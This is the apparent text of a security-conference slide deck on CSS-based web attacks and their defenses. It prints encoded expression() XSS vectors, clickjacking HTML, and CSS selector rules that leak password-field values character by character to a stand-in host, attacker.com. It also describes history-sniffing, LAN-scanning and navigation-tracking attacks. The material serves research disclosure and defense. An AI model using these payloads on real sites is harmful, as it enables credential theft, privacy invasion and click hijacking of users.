The Sexy Assassin

Tactical Exploitation using CSS

CSS Presentation Overview

Old Attacks

New Research

New Attacks
Old Attacks - reloaded

Known attacks using CSS

XSS using CSS - Impact

Session riding/hijacking attack

Steal page data content

Exploit BoF/HoF/Memory Corruption/etc.

vulnerabilities

All other XSS threads

Expression XSS

CSS values can be escaped with backslashes

<div style=xss:e\xp\re\s\s\i\o\n(alert(1))></div>
Then further encoded with hex/decimal entities
<div
style=xss:e&#92xp&#92re&#92s&#92s&#92i&#92o&#92n(ale
rt(1))></div>

Following the CSS specification you can encode expressions

with hex escapes
<div style=xss:\65\78\70\72\65\73\73\69\6f\6e\28
\61\6c\65\72\74\28\31\29\29></div>
Expression XSS continued

We can also entity encode the previous vector

<div
style=xss:&#92&#54&#53&#92&#55&#56&#92&#55&#48&#92
&#55&#50&#92&#54&#53&#92&#55&#51&#92&#55&#51&#92
&#54&#57&#92&#54&#102&#92&#54&#101&#92&#50&#56&#92
&#54&#49&#92&#54&#99&#92&#54&#53&#92&#55&#50&#92&#55
&#52&#92&#50&#56&#92&#51&#49&#92&#50&#57&#92&#50&#57
></div>
External style sheet tricks

• Expressions can be executed in external style sheets

• We can encode the vector
• We can also encode the content

Importing expressions from a XSS file

<style>@\69\6d\70\6f\72\74 'xss.css';</style>

How can we encode the content of a style sheet?

<style>@import 'utf.css';</style>
 UTF-7 Expression

UTF-7 encoded style sheet

@charset "UTF-7";
+ACoAIAB7AHgAcwBzADoAZQB4AHAAcgBlAHMAcw
BpAG8AbgAoAGEAbABlAHIAdAAoADEAKQApAH0-

Which produces:

* {xss:expression(alert(1))}
CSS Overlays (clickjacking)

CSS Overlays (clickjacking) Definition:

Convincing the user to click something, and use that click to do

something else (bad things)
CSS Overlays description

Original WebPage Attacker page

_____________________________
(iframe)
_____________________________
_____________
_____________________________

Click here to continue

Button

_______________ ______________
_______________ ______________
_______________ ______________
CSS Overlays advanced attacks

• Multiple iframes nested

• Using offsets to gather a piece of a target site

• No opacity, filled white div regions

• Single sign on services vulnerable

• Combined Javascript and CSS tricks to intercept a click,

impossible to know until it's too late
CSS Overlays advanced attacks
Verisign case study
iframe performs a login request on site (ficlets.com)

<form 
action="http://ficlets.com/signin/openid.signin" 
method="post" id="openid­form" target="iframe">
<input type="hidden" name="openid" 
id="openid­url" class="text­field" 
value="openidtester.pip.verisignlabs.com" /> 
</form>

ficlets.com connects to Verisign provider 
CSS Overlays advanced attacks
Verisign case study cont.
OpenID provider (Verisign) is now in our iframe
CSS Overlays advanced attacks
Verisign case study cont.
Using multiple iframes and div offsets we can cover the other areas
with solid colours and position the target area wherever we like
CSS Overlays advanced attacks
Verisign case study cont.
• Opacity can be used but solid fills make the attack harder to
protect against at the browser level
• Referer checking can neuter attack but not always available and no
implemented on most sites
• Referer can be faked
• David Ross idea to use a "clickjacket", accessible style sheet
which uses expressions to display a hover popup which appears
above other elements.
CSS Overlays Work Arrounds
Someone -> iframe-breaker
In some browsers (IE) JS can be disabled (iframe-
breaker-breaker)

NoScript -> Opacity disabled on remote iframes and embed content.

CSS overlays that don't require Opacity still work.

Michal Zalewski -> click if not obstructed

Still works against some no-opacity overlays attacks.

Mozilla -> Delayed disabled-buttons.

Still exploitable

David Ross -> X-I-Don't-Wanna-Be-Iframed-Please

Old browsers and websites still vulnerable.
Exploiting clickjacking defenses

• iframe hover state can be intercepted

• No way to tell if you're hovering over an external site
• Clicks can then be transferred to the iframe when a user clicks

<html>
<head>
</head>
<body>
<image ISMAP style="position:absolute;width:100%;height:100%;" 
onmousedown="this.style.display='none'">
<iframe src="http://www.microsoft.com" id=x type=text/html 
width=500 height=500 codetype=text/html id=x></iframe></image>
</button>
</body>
</html> 
Exploiting clickjacking defenses

• Image intercepts the hover state

• Image is hidden onmousedown
• The click is transferred to the iframe because the mousedown state
is used, onmouseup we're in the iframe
More clickjacking defenses

• My extension to David Ross' click jacket

• Full metal click jacket
• CSS accessible style sheet is used to override browser defaults
with !important.

iframe,frame,object,applet {
    border:1px solid #000 !important;
    visibility:visible !important;
    opacity: 1 !important;
    filter: alpha(opacity=100) !important;
    position:absolute !important;
    float:none !important;
    overflow:auto !important;
    ....
}
More clickjacking defenses

Advantages:
• Object styles are locked
• User can see clearly that it is a external site
• Javascript and CSS modification of styles have no effect

Disadvantages:
• Manuel Caballero hacked it :)
• Parent element allows opacity modification
More clickjacking defenses

Browser level CSS locks could prevent attacks

Advantages:
• Hard for attacker to exploit if external objects are clearly visible
and above everything else

Disadvantages:
• Designers would complain about limiting design ideas
• External objects would look ugly
• Could break existing sites
New Research

Algorithms
Arithmetics & Memory
- Check out Demos on http://p42.us/css

How:
element:condition{
action;
}

element: anything
condition: :visited, :active, :hover, :selected, etc..
action: background(remote request), display,
opacity, visibility.
Loops
- Check out Demos on http://p42.us/css

Recalc of style:

- META refreshes
<meta http-equiv=“refresh” content=“0;URL=#1”>

- -moz-binding
*{-moz-binding:url(“remote-req#id”)}

- webkit proposed CSS based animations (not very

useful)
@keyframes{}
Server Side Interaction
- Check out Demos on http://p42.us/css

Use HTML+XML data loading (just IE or just FFx)

MSIE HTC files, XML DATAFLD
moz-binding
Metarefreshes + Stylesheet update (it’s not cross-browser)
<meta http-equiv=“refresh” content=“0”>
Async stylesheet loading (doesn’t work on strict mode)
<element>
<style>@import”//url1”;</style>
<style>@import”//url2”;</style>
Multiple iframe loading (works everywere)
<iframe src=“site.com/”></iframe>
<iframe src=“site.com//”></iframe>
 New attacks

Attacks possible thanks to the "theory"

CSS HTML Attribute Reader

CSS HTML Attribute Reader

How to read HTML Attributes using CSS, without javascript.

CSS HTML Attribute Reader

Advanced CSS3 Attribute Selectors:

For matching:
<input type=“password” value=“savedpassword”/>

• input{}
– Matches all inputs.

• input[type]{}
– Matches all inputs with an attribute “type”.

• input[type=“password”]{}
– Matches all inputs of type “password”.
CSS HTML Attribute Reader

Advanced CSS3 Attribute Selectors:

For matching:
<input type=“password” value=“savedpassword”/>

• input[type*=“swor”]{}
– Matches all input elements whose type attribute contains “swor”
(anywhere)

• input[type^=“pass”]{}
– Matches all inputs whose type attribute starts with “pass”

• input[type$=“word”]{}
– Matches all inputs whose type attribute ends with “word”
CSS HTML Attribute Reader

Attempts to read an attribute with [=] selector with help of the [*=]
selector!
Calculate the range of the chars in the value.

input[value*=“\x10”]{
background:url(“//attacker.com/?h=\x10”);
}
…
111 different variations
…
input[value*=“\x7F”]{
background:url(“//attacker.com/?h=\x7F”);
}
CSS HTML Attribute Reader – Try 3

To calculate the first letter if we asume from

the previews step that the range is [uiopasdf]
input[value^=“u”]{
background:url(“//attacker.com/?s=u”);
}
…
and so, 8 questions... u,i,o,p,a,s,d,f
…
input[value^=“f”]{
background:url(“//attacker.com/?s=f”);
}
CSS HTML Attribute Reader – Try 3

Once we found the first char (let’s say it was

d) we continue with [uiopasf] :
input[value^=“du”]{
background:url(“//attacker.com/?s=du”);
}
…
and so, 7 questions... u,i,o,p,a,s, ,f
…
input[value^=“df”]{
background:url(“//attacker.com/?s=df”);
}
CSS HTML Attribute Reader – Try 3

And so on. If we assume known attribute

length, but allow for repeats…

111+N^2 CSS rules

In the worst case for 8 chars: 175 CSS rules

In the worst case for 50 chars: 2,611 CSS rules

CSS HTML Attribute Reader

We can optimize this more, but at an implementation level.

First, we can use [^=] and [$=] selectors at the same time halving
the number of requests.
CSS HTML Attribute Reader

1 2 3
Detect first char Detect second char
Detect the range
and eigthth char and seventh char

4 5 6
Detect third char Detect fourth char Confirm we have
and sixth char and fifth char the correct string
CSS HTML Attribute Reader

Demo:
-
Async stylesheet load attribute reader (read the contents of a text field w

http://eaea.sirdarckcat.net/cssar/

Parallel discovery by Stefano Di Paola (WiSec) with

111*N complexity (888 rules for 8 chars)
http://www.wisec.it/
-1day (0Day-1) - Cross Site Styling

HTML5 Describes seamless iframes.

So HTML Attribute reading would be a vulnerability in a non-

implemented standard!

These will inherit all styles of the parent document (cross origin).

CSS will read content cross-origin!

Call for Microsoft's guys in the W3C HTML5 WG:

Stop this! make it same-origin only ;)

<style>@import”exploit”;</style>
<iframe src=“victim” seamless=“seamless”/>
CSS History Hacks

CSS History Hacks

Attacks based on the possibility of CSS of reading a browser's

History.
Visited boolean

Cross-browser
<style>
a:visited{background:url(//visited)}
a:not(:visited){background:url(//not-visited)}
</style>
<a href="http://website/">&nbsp;</a>

Impact Privacy

Counter-measures
Firefox: SafeHistory addon
IE: Disable history

Demo: http://ha.ckers.org/weird/CSS-history.cgi
CSS LAN Scanner

PoC:
CSS LAN Scanner

How it works:
Error pages don't create a log in the history.
If a website is valid, then it is marked as visited.
The scanner just visits a lot of LAN IPs, and checks
if they were marked as visited.
CSS LAN Scanner

attacker.com

Victim visits attacker.com.

10.3.22.111
Private webservice
victim LAN intranet
192.168.1.254
Configuration
router
CSS LAN Scanner

attacker.com

attacker.com tries to open a lot

of local ip addresses on
iframes, most will fail.

10.3.22.111
Private webservice
victim LAN intranet
192.168.1.254
Configuration
router
CSS LAN Scanner

attacker.com

attacker.com then asks which

websites appear as visited, and
so, those IPs are up.

10.3.22.111
Private webservice
victim LAN intranet
192.168.1.254
Configuration
router
CSS LAN Scanner

attacker.com

The victim responds attacker

with the visited IPs.

10.3.22.111
Private webservice
victim LAN intranet
192.168.1.254
Configuration
router
CSS LAN Scanner

attacker.com

attacker.com then tries to guess the

service on those IPs based on ports, and if
necessary, the content of remote
Stylesheets

10.3.22.111
Private webservice
victim LAN intranet
192.168.1.254
Configuration
router
CSS LAN Scanner

attacker.com

attacker.com then sends CSRF attacks

against the detected software behind the
LANs.

10.3.22.111
Private webservice
victim LAN intranet
192.168.1.254
Configuration
router
CSSH - CSS Stealing Some History

CSSH - CSS Stealing Some History

History Crawler + Navigation Monitoring!

CSSH - History Crawler

attacker.com shows a
digg.com
lot of possible websites
twitter.com that the user may have
slashdot.org visited.
hi5.com
myspace

attacker.com google news

msn.com
del.icio.us
live.com
sla.ckers.org
Redtube
facebook

Victim 
CSSH - History Crawler

The victim responds the

digg.com
attacker with the
twitter.com websites visited.
slashdot.org
hi5.com
myspace

attacker.com google news

msn.com
del.icio.us
live.com
sla.ckers.org
Redtube
facebook

Victim 
CSSH - History Crawler

Attacker fetches the

links of those websites,
and asks which ones are
visited.
Link #1
Link #2
Link #3 The victim responds,
attacker.com Link #4 and the exploit asks
Link #5
Link #6
again endlessly.

Victim 
CSSH - History Crawler

This way we can effectivelly crawl commonly visited websites of a

user.

The privacy implications of this are huge.

This attack is not a secret, it was described in Mozilla’s bugtrack by

Paul Stone:
https://bugzilla.mozilla.org/show_bug.cgi?id=147777#c78

 
CSSH - Navigation Monitoring

What if...

We could detect in real-time the navigation of a user using our

history crawler?

Might this be possible?

Yes 
CSSH - Navigation Monitoring

Attacker 

Victim visits attacker.com

Victim 
CSSH - Navigation Monitoring

Attacker 

attacker.com sends exploit to user, and opens digg.com.

Victim 

digg.com
CSSH - Navigation Monitoring

Attacker 

The exploit detects that digg.com was visited, so it

alerts attacker.com, and attacker.com fetches the
links on digg.com.

Victim 

digg.com
CSSH - Navigation Monitoring

Attacker 

Then, the attacker updates the exploit, and

start asking for each link if anyone of them
are visited.
Victim 

digg.com
CSSH - Navigation Monitoring

Attacker 

When the user finally clicks on a link,

the exploit detects it, and alert’s
attacker.com
Victim 

digg.com cnn.com
CSSH - Navigation Monitoring

Attacker 

attacker.com fetches all links on cnn.com,

and updates the exploit asking wether they
where visited.

Victim 

digg.com cnn.com
CSSH - Navigation Monitoring

Attacker 

Repeat above steps indefinitely.

Victim 

digg.com cnn.com
CSSH - Navigation Monitoring

Public Demo :
http://eaea.sirdarckcat.net/cssh-mon/

Cross-browser.
 Thanks

We would like to thank:

Bluehat team, David Ross, Robert Hansen,
Jeremiah Grossman, Giorgio Maone, Alex K,
David Lenoe (Adobe PSIRT), Google Sec. Team,
Stefano DiPaola, and everyone else that asisted in
any way our research.